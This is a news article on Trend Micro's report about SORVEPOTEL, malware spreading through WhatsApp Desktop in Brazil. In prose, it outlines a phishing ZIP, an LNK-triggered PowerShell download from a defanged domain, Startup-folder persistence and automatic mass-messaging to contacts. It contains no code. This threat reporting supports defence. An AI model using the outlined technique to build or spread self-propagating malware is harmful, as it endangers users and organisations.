Your friend sent a ZIP file on WhatsApp? It's already infected, and you're next.
Hundreds of companies hit by SORVEPOTEL. It doesn't steal data. It doesn't demand a ransom. It just endlessly multiplies.
Hundreds of companies hit by SORVEPOTEL. It doesn't steal data. It doesn't demand a ransom. It just endlessly multiplies.
Trend Micro researchers have documented a large-scale malware campaign targeting users in Brazil. The distribution is carried out through the desktop version of WhatsApp and is characterized by a high infection rate. The malware, internally named SORVEPOTEL, does not engage in data theft or encryption, as is typical for spyware or ransomware. Its main goal is to replicate as quickly as possible and infect new systems.
The infection begins with a phishing message coming from an already compromised WhatsApp contact. This creates an illusion of authenticity and prompts the victim to open the attached ZIP file. The file is disguised as a harmless document—such as a receipt or a file supposedly related to a medical application. According to Trend Micro data, in some cases, a similar ZIP archive has also been distributed via email from fake but seemingly plausible addresses.
Once the user opens the archive, their attention is drawn to the included Windows shortcut (LNK file). Executing this shortcut discreetly activates a PowerShell script, which connects to an external server (e.g., sorvetenopoate[.]com) and downloads the main malicious component. The downloaded script is added to the startup sequence via the Windows Startup system folder to run automatically upon every reboot. It also contains a PowerShell command to contact a command-and-control (C2) server for further instructions or to download other malicious modules.
Of course, the distribution mechanism via WhatsApp Web is the central element of the entire scheme. If the malware detects that the web version of the messenger is active on the infected machine, it automatically sends the same ZIP file to all of the user's contacts and group chats. This self-propagation method through WhatsApp allows the malware to rapidly spread to new systems with almost no human intervention.
According to Trend Micro, "this automatic mass-messaging results in a large amount of spam messages and often ends with WhatsApp blocking the compromised account for violating its terms of service." The researchers note that the campaign operators appear to be interested primarily in the scale of the infection, rather than access to confidential information. No signs of data theft or file encryption were detected.
Out of 477 recorded infection cases, 457 were in Brazil. Government entities, as well as organizations in the education, industrial, technology, construction, and utility sectors were hit. The researchers emphasize that the phishing message text is designed to be opened specifically on a computer, which may indicate a focus on the business environment rather than ordinary users.
"SORVEPOTEL demonstrates how cybercriminals are increasingly using popular communication platforms like WhatsApp for fast, large-scale malware distribution with minimal victim involvement," Trend Micro concludes.
